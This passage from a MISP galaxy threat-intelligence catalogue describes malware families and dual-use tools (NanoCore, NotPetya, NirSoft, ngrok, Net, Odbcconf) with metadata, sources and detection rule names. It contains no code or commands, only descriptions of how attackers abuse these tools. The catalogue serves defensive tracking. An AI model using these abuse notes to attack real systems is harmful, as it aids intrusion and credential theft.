which can be used as unique global reference for msxsl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5229 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MURKYTOP
MURKYTOP is a reconnaissance tool used by Leviathan. [FireEye Periscope March 2018]
Internal MISP references
UUID 768111f9-0948-474b-82a6-cd5455079513
which can be used as unique global reference for MURKYTOP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0233 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mythic
Mythic is an open source, cross-platform post-exploitation/command and control platform. Mythic is designed to "plug-n-play" with various agents and communication channels.[Mythic Github][Mythic SpecterOps][Mythic Documentation] Deployed Mythic C2 servers have been observed as part of potentially malicious infrastructure.[RecordedFuture 2021 Ad Infra]
Internal MISP references
UUID f1398367-a0af-4a89-b240-50cae4985ed9
which can be used as unique global reference for Mythic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0699 |
source | MITRE |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Naid
Naid is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Naid June 2012]
Internal MISP references
UUID 5cfd6135-c53b-4234-a17e-759494b2101f
which can be used as unique global reference for Naid
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0205 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NanHaiShu
NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute. [Proofpoint Leviathan Oct 2017] [fsecure NanHaiShu July 2016]
Internal MISP references
UUID 0e28dfc9-8948-4c08-b7d8-9e80e19cc464
which can be used as unique global reference for NanHaiShu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0228 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NanoCore
NanoCore is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.[DigiTrust NanoCore Jan 2017][Cofense NanoCore Mar 2018][PaloAlto NanoCore Feb 2016][Unit 42 Gorgon Group Aug 2018]
Internal MISP references
UUID db05dbaa-eb3a-4303-b37e-18d67e7e85a1
which can be used as unique global reference for NanoCore
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0336 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NativeZone
NativeZone is the name given collectively to disposable custom Cobalt Strike loaders used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021][SentinelOne NobleBaron June 2021]
Internal MISP references
UUID a814fd1d-8c2c-41b3-bb3a-30c4318c74c0
which can be used as unique global reference for NativeZone
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0637 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NavRAT
NavRAT is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. [Talos NavRAT May 2018]
Internal MISP references
UUID b410d30c-4db6-4239-950e-9b0e0521f0d2
which can be used as unique global reference for NavRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0247 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NBTscan
NBTscan is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.[Debian nbtscan Nov 2019][SecTools nbtscan June 2003][Symantec Waterbug Jun 2019][FireEye APT39 Jan 2019]
Internal MISP references
UUID 950f13e6-3ae3-411e-a2b2-4ba1afe6cb76
which can be used as unique global reference for NBTscan
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0590 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
nbtstat
nbtstat is a utility used to troubleshoot NetBIOS name resolution. [TechNet Nbtstat]
Internal MISP references
UUID 81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e
which can be used as unique global reference for nbtstat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0102 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NDiskMonitor
NDiskMonitor is a custom backdoor written in .NET that appears to be unique to Patchwork. [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID 6d42e6c5-3056-4ff1-8d5d-a736807ec84c
which can be used as unique global reference for NDiskMonitor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0272 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Nebulae
Nebulae is a backdoor that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]
Internal MISP references
UUID 38510bab-aece-4d7b-b621-7594c2c4fe14
which can be used as unique global reference for Nebulae
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0630 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Neoichor
Neoichor is C2 malware used by Ke3chang since at least 2019; similar malware families used by the group include Leeson and Numbldea.[Microsoft NICKEL December 2021]
Internal MISP references
UUID 8662e29e-5766-4311-894e-5ca52515ccbe
which can be used as unique global reference for Neoichor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0691 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Nerex
Nerex is a Trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Nerex May 2012]
Internal MISP references
UUID de8b18c9-ebab-4126-96a9-282fa8829877
which can be used as unique global reference for Nerex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0210 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Net
The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [Microsoft Net Utility]
Net has a great deal of functionality, [Savill 1999] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.
Internal MISP references
UUID c9b8522f-126d-40ff-b44e-1f46098bd8cc
which can be used as unique global reference for Net
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0039 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4e7ae33d-e040-4618-bccf-3b5e4aac81ed', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Net Crawler
Net Crawler is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using PsExec to execute a copy of Net Crawler. [Cylance Cleaver]
Internal MISP references
UUID 947c6212-4da8-48dd-9da9-ce4b077dd759
which can be used as unique global reference for Net Crawler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0056 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NETEAGLE
NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” [FireEye APT30]
Internal MISP references
UUID 852c300d-9313-442d-9b49-9883522c3f4b
which can be used as unique global reference for NETEAGLE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0034 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
netsh
netsh is a scripting utility used to interact with networking components on local or remote systems. [TechNet Netsh]
Internal MISP references
UUID 803192b8-747b-4108-ae15-2d7481d39162
which can be used as unique global reference for netsh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0108 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '064dc489-6b50-4cc1-bb9b-fe722f21aaf1', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
netstat
netstat is an operating system utility that displays active TCP connections, listening ports, and network statistics. [TechNet Netstat]
Internal MISP references
UUID 132fb908-9f13-4bcf-aa64-74cbc72f5491
which can be used as unique global reference for netstat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0104 |
source | MITRE |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NetSupport
NetSupport is a legitimate utility that has long been used for remote management and monitoring (RMM) purposes. In recent years, it has been heavily abused by threat actors for maintaining persistent remote access to victim systems.[The DFIR Report NetSupport October 30 2023]
Internal MISP references
UUID 96ecdb59-b047-4557-b2a7-c9712e8c903b
which can be used as unique global reference for NetSupport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S5320 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NetTraveler
NetTraveler is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. [Kaspersky NetTraveler]
Internal MISP references
UUID 1b8f9cf9-db8f-437d-800e-5ddd090fe30d
which can be used as unique global reference for NetTraveler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0033 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Netwalker
Netwalker is fileless ransomware written in PowerShell and executed directly in memory.[TrendMicro Netwalker May 2020]
Internal MISP references
UUID 5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d
which can be used as unique global reference for Netwalker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0457 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '242bc007-5ac5-4d96-8638-699a06d06d24', 'e554bd60-5de3-4162-9ed3-66073ae9d6b3', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '2743d495-7728-4a75-9e5f-b64854039792', '4fb4824e-1995-4c65-8c71-e818c0aa1086', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
NETWIRE
NETWIRE is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.[FireEye APT33 Sept 2017][McAfee Netwire Mar 2015][FireEye APT33 Webinar Sept 2017]
Internal MISP references
UUID c7d0e881-80a1-49ea-9c1f-b6e53cf399a8
which can be used as unique global reference for NETWIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0198 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Network Scanner
Network Scanner (NS.exe) is a utility that can be used to enumerate file shares within a given environment.[The DFIR Report Dharma Ransomware June 2020]
Internal MISP references
UUID 56018455-7644-4e59-845a-986f55efcad4
which can be used as unique global reference for Network Scanner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5278 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NGLite
NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN (New Kind of Network) technology to communicate between the backdoor and the actors.[NGLite Trojan]
Internal MISP references
UUID 48b161fe-3ae1-5551-9f26-d6f2d6b5afb9
which can be used as unique global reference for NGLite
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1106 |
source | MITRE |
type | ['malware'] |
ngrok
ngrok is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. ngrok has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.[Zdnet Ngrok September 2018][FireEye Maze May 2020][Cyware Ngrok May 2019][MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 316ecd9d-ac0b-58c7-8083-5d9214c770f6
which can be used as unique global reference for ngrok
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0508 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'd75c1a80-0cb8-4a64-8379-10514cd44b1e', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Nidiran
Nidiran is a custom backdoor developed and used by Suckfly. It has been delivered via strategic web compromise. [Symantec Suckfly March 2016]
Internal MISP references
UUID 3ae9acd7-39f8-45c6-b557-c7d9a40eed2c
which can be used as unique global reference for Nidiran
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0118 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NightClub
NightClub is a modular implant written in C++ that has been used by MoustachedBouncer since at least 2014.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID b1963876-dbdc-5beb-ace3-acb6d7705543
which can be used as unique global reference for NightClub
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1090 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ninja
Ninja is malware developed in C++ that has been used by ToddyCat to penetrate networks and control remote systems since at least 2020. Ninja is possibly part of a post-exploitation toolkit used exclusively by ToddyCat and allows multiple operators to work simultaneously on the same machine. Ninja has been used against government and military entities in Europe and Asia and has been observed in specific infection chains being deployed by Samurai.[Kaspersky ToddyCat June 2022]
Internal MISP references
UUID 2dd26ff0-22d6-591b-9054-78e84fa3e05c
which can be used as unique global reference for Ninja
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1100 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NirSoft
NirSoft is a self-described "freeware" utility that can be used to recover passwords.[NirSoft Website] According to U.S. cybersecurity authorities, ransomware actors such as those associated with the Royal ransomware operation have used the NirSoft utility to harvest passwords for malicious purposes.[#StopRansomware: Royal Ransomware | CISA]
Internal MISP references
UUID efa5fff4-f6db-4719-91c7-97dbe93099a8
which can be used as unique global reference for NirSoft
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5271 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
njRAT
njRAT is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.[Fidelis njRAT June 2013]
Internal MISP references
UUID 82996f6f-0575-45cd-8f7c-ba1b063d5b9f
which can be used as unique global reference for njRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0385 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NKAbuse
NKAbuse is a Go-based, multi-platform malware abusing NKN (New Kind of Network) technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities.[NKAbuse BC][NKAbuse SL]
Internal MISP references
UUID e26988e0-e755-54a4-8234-e8f961266d82
which can be used as unique global reference for NKAbuse
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S1107 |
source | MITRE |
type | ['malware'] |
Nltest
Nltest is a Windows command-line utility used to list domain controllers and enumerate domain trusts.[Nltest Manual]
Internal MISP references
UUID fbb1546a-f288-4e43-9e5c-14c94423c4f6
which can be used as unique global reference for Nltest
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0359 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '24f6ba0e-9230-4410-a9fb-b0f3b55de326', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Nmap
According to its project website, "Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing".[Nmap: the Network Mapper]
Internal MISP references
UUID 042e61cf-a8e1-42ec-8974-a3b2e2037c08
which can be used as unique global reference for Nmap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5051 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6ff40d11-214a-434b-b137-993e4ff5e34e', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NOKKI
NOKKI is a modular remote access tool. The earliest observed attack using NOKKI was in January 2018. NOKKI has significant code overlap with the KONNI malware family. There is some evidence potentially linking NOKKI to APT37.[Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018]
Internal MISP references
UUID 31aa0433-fb6b-4290-8af5-a0d0c6c18548
which can be used as unique global reference for NOKKI
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0353 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NotPetya
NotPetya is malware that was used by Sandworm Team in a worldwide attack starting on June 27, 2017. While NotPetya appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.[Talos Nyetya June 2017][US-CERT NotPetya 2017][ESET Telebots June 2017][US District Court Indictment GRU Unit 74455 October 2020]
Internal MISP references
UUID 2538e0fe-1290-4ae1-aef9-e55d83c9eb23
which can be used as unique global reference for NotPetya
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0368 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Npcap
According to its project website, "Npcap is the Nmap Project's packet capture (and sending) library for Microsoft Windows".[Npcap: Windows Packet Capture Library & Driver] Nmap is a utility used for network discovery and security auditing.
Internal MISP references
UUID d1817595-9186-4749-aeab-26c774c1885d
which can be used as unique global reference for Npcap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5052 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Ntdsutil
Ntdsutil is a Windows command-line tool "that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS)."[Ntdsutil Microsoft]
Internal MISP references
UUID 9af571bb-f3c7-434b-8187-3e4ceb0ec6fc
which can be used as unique global reference for Ntdsutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5018 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '1da5eb1e-7ac5-4284-99cb-ce227cad8983', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ObliqueRAT
ObliqueRAT is a remote access trojan, similar to Crimson, that has been in use by Transparent Tribe since at least 2020.[Talos Oblique RAT March 2021][Talos Transparent Tribe May 2021]
Internal MISP references
UUID 97e8148c-e146-444c-9de5-6e2fdbda2f9f
which can be used as unique global reference for ObliqueRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0644 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
OceanSalt
OceanSalt is a Trojan that was used in a campaign targeting victims in South Korea, the United States, and Canada. OceanSalt shares code similarity with SpyNote RAT, which has been linked to APT1.[McAfee Oceansalt Oct 2018]
Internal MISP references
UUID f1723994-058b-4525-8e11-2f0c80d8f3a4
which can be used as unique global reference for OceanSalt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0346 |
source | MITRE |
type | ['malware'] |
Octopus
Octopus is a Windows Trojan written in the Delphi programming language that has been used by Nomadic Octopus to target government organizations in Central Asia since at least 2014.[Securelist Octopus Oct 2018][Security Affairs DustSquad Oct 2018][ESET Nomadic Octopus 2018]
Internal MISP references
UUID 8f04e609-8773-4529-b247-d32f530cc453
which can be used as unique global reference for Octopus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0340 |
source | MITRE |
type | ['malware'] |
Odbcconf
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used in Windows for managing ODBC connections
Author: Oddvar Moe
Paths:
* C:\Windows\System32\odbcconf.exe
* C:\Windows\SysWOW64\odbcconf.exe
Resources:
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
* https://github.com/woanware/application-restriction-bypasses
* https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Detection:
* Sigma: proc_creation_win_odbcconf_response_file.yml
* Sigma: proc_creation_win_odbcconf_response_file_susp.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml[LOLBAS Odbcconf]
Internal MISP references
UUID 5e434819-7f4a-440c-a9bd-7675c0218be1
which can be used as unique global reference for Odbcconf
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5134 |
source | Tidal Cyber |
tags | ['64825d12-3cd6-4446-a93c-ff7d8ec13dc8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
OfflineScannerShell
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Defender Offline Shell
Author: Elliot Killick
Paths:
* C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Resources: None Provided
Detection:
* Sigma: proc_creation_win_lolbas_offlinescannershell.yml
* IOC: OfflineScannerShell.exe should not be run on a normal workstation[OfflineScannerShell.exe - LOLBAS Project]
Internal MISP references
UUID 8bc7c62a-110d-451b-9ca6-bc48a13e72d4
which can be used as unique global reference for OfflineScannerShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5135 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Okrum
Okrum is a Windows backdoor that has been seen in use since December 2016 with strong links to Ke3chang.[ESET Okrum July 2019]
Internal MISP references
UUID f9bcf0a1-f287-44ec-8f53-6859d41e041c
which can be used as unique global reference for Okrum
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0439 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
